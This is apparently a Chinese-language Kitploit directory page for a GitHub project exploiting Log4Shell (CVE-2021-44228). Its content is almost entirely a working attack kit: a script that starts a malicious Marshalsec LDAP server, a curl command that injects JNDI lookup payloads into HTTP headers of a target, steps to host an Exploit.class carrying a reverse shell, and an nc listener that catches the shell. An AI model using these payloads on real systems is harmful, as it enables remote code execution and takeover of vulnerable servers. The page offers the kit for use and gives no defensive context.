Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-44228-Log4Shell- — 渗透测试 | Kitploit
工具/GitHubGitHub/khaidtraivch/cve-2021-44228-log4shell-
Payload生成漏洞分析漏洞利用Web应用程序漏洞利用命令与控制远程访问工具
GitHubkhaidtraivch/cve-2021-44228-log4shell-

CVE-2021-44228-Log4Shell-

渗透测试

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享
查看仓库
1年前尚未审核

CVE-2021-44228-Log4Shell-

渗透测试

  1. 创建恶意LDAP服务器(使用Marshalsec) #!/bin/bash

Script: start_ldap_server.sh

要求:安装Java和Marshalsec (https://github.com/mbechler/marshalsec)

LDAP_PORT="1389" HTTP_PORT="8000" ATTACKER_IP="192.168.0.101" REVERSE_PORT="5555"

echo "[+] 在端口 $LDAP_PORT 上启动恶意LDAP服务器..." java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer
"http://$ATTACKER_IP:$HTTP_PORT/#Exploit" $LDAP_PORT

  1. 从被攻陷的Web服务器发送Log4Shell Payload

#!/bin/bash

Script: exploit_log4shell.sh

目标:向Windows目标机器发送JNDI payload

TARGET_IP="192.168.1.10" ATTACKER_IP="192.168.0.101" LDAP_PORT="1389"

echo "[+] 发送Log4Shell payload到 $TARGET_IP..." curl -X GET
"http://$TARGET_IP"
-H "User-Agent: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"
-H "X-Api-Version: ${jndi:ldap://$ATTACKER_IP:$LDAP_PORT/Exploit}"

使用方法

启动LDAP服务器:

./start_ldap_server.sh

运行HTTP服务器以托管Exploit.class文件(包含反向shell):

python3 -m http.server 8000

从被攻陷的Web服务器发送payload

./exploit_log4shell.sh

在攻击机上监听反向shell:

nc -lvnp 5555

下载工具